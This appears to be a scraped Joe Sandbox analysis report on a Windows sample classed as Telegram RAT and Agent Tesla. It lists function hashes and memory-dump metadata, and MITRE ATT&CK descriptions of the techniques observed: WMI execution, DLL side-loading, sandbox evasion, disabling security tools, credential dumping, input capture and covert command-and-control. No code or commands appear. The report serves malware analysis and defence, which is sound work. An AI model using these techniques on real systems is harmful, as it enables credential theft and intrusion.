Instruction Fuzzy Hash: 3F118F30B002048FEF66AA78D4403AF7A96FF45364F208939E006DF395DB61CA858BC9

Uniqueness

Uniqueness Score: -1.00%

Function 025B083B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4140c37449b71286a569b0285b8fe9cdcdbb3f5ab63fae5e2b91081225363226
Instruction ID: 152427724ef65922a607e07cefc92e14486c3e9fa42c8bf70a63594ee6379a8b
Opcode Fuzzy Hash: 4140c37449b71286a569b0285b8fe9cdcdbb3f5ab63fae5e2b91081225363226
Instruction Fuzzy Hash: E3118230A042048BEF27577494503AF7B61FF46264F24897AE046DB2D5DB65CA868BC9

Uniqueness

Uniqueness Score: -1.00%

Function 025B1773 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16e55798a67bcbdcb290dceef647821bbd5601d321e7a7317cc6acdc3769ca83
Instruction ID: c09da2a4366c29157530b64f9f136f794938eac65c03d811b5747b8316111a88
Opcode Fuzzy Hash: 16e55798a67bcbdcb290dceef647821bbd5601d321e7a7317cc6acdc3769ca83
Instruction Fuzzy Hash: 08110235F006019FCB62AF74985866F7BFAFF88660F108829E909D3344EB30C8568B91

Uniqueness

Uniqueness Score: -1.00%

Function 0086D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888221637.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 6fc87f2acf4218211bccc5b165da801678694453574ac9142467dde9d62b6925
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: E511BB75A04780CFCB11CF14D5C4B15FBA1FB84314F28C6AAD8498B656C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 025B1448 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c0b00a539ad860d0993e83f6a01f6a1b38014bc520e336d6a5e47b717e82028
Instruction ID: f94919187b3694043170a704225ad6d239d8d37577c065a1ea9f5ae84383de45
Opcode Fuzzy Hash: 5c0b00a539ad860d0993e83f6a01f6a1b38014bc520e336d6a5e47b717e82028
Instruction Fuzzy Hash: 1C012D31F006158FCF62EFB884642EEBBE6FF88314B1444B9D809E7241E735D9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 025B7050 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47be5f1692e7801d0048100170f0706093c349ccfae226af6e8e02ee254a0089
Instruction ID: e23a4fc5cddd986a19745e29a9869627413692be32a805a8d13027505ac92f36
Opcode Fuzzy Hash: 47be5f1692e7801d0048100170f0706093c349ccfae226af6e8e02ee254a0089
Instruction Fuzzy Hash: 0F012939B00504CFD719DB74D558A6D7BB2FF88225B5654A9E40ACB374CB309D82CF41

Uniqueness

Uniqueness Score: -1.00%

Function 025B80E0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3ce049a8aea6b4695d97e167ed5afdaaae852212abdd8075f7833b98c5a754
Instruction ID: 87f37ff9a1ed3602d68ac26df9fed4de212e2410dc03625b7e2e119454209a95
Opcode Fuzzy Hash: 8a3ce049a8aea6b4695d97e167ed5afdaaae852212abdd8075f7833b98c5a754
Instruction Fuzzy Hash: 50018474900208AFDB05EBB8E991A9CBBB5EF40344F6455B4C4049B369DF30AA4A9782

Uniqueness

Uniqueness Score: -1.00%

Function 025B80F0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13c100dbe1392b1ee443e082eeb5a98838c687e0c50efdee61c361d3078457e
Instruction ID: c9d467ed6597816c47b2922a420c395e8d0b63c05468ba2859ccc8e8bb3e205c
Opcode Fuzzy Hash: b13c100dbe1392b1ee443e082eeb5a98838c687e0c50efdee61c361d3078457e
Instruction Fuzzy Hash: 0FF04434A10209AFDB05FFA8F981A9DBBB5EB40344F605578C4049736CDF306E499BD2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 025B4178 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2888856032.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25b0000_17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b6df10e9322045a7367e1ffbffdbfde5f815be7b7298a3a91ce1ed7444b25f4
Instruction ID: ac69f0106ba2341779f28f35263c4e22cb95839e614d92a723eb0d343ba86b88
Opcode Fuzzy Hash: 2b6df10e9322045a7367e1ffbffdbfde5f815be7b7298a3a91ce1ed7444b25f4
Instruction Fuzzy Hash: DDB16E70E002098FDF21CFA9D8957EEBBF2BF88304F148529D415A7295EB749895CF85

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Function 025B4A48 Relevance: .3, Instructions: 266
COMMON

Function 025B3E30 Relevance: .2, Instructions: 238
COMMON

Function 025B6E97 Relevance: 2.6, Strings: 2, Instructions: 144
COMMON

Function 025BF2DD Relevance: 2.6, Strings: 2, Instructions: 118
COMMON

Function 06470C70 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 064732E0 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Function 064723F0 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Function 025B6F38 Relevance: 1.3, Strings: 1, Instructions: 99
COMMON

Function 025B6B60 Relevance: 1.3, Strings: 1, Instructions: 57
COMMON

Function 025B78F8 Relevance: .6, Instructions: 559
COMMON

Function 025B96D0 Relevance: .4, Instructions: 352
COMMON

Function 025B4A3C Relevance: .3, Instructions: 262
COMMON

Function 025B3E24 Relevance: .2, Instructions: 235
COMMON

Function 025B47C0 Relevance: .2, Instructions: 180
COMMON

Function 025B47B4 Relevance: .2, Instructions: 180
COMMON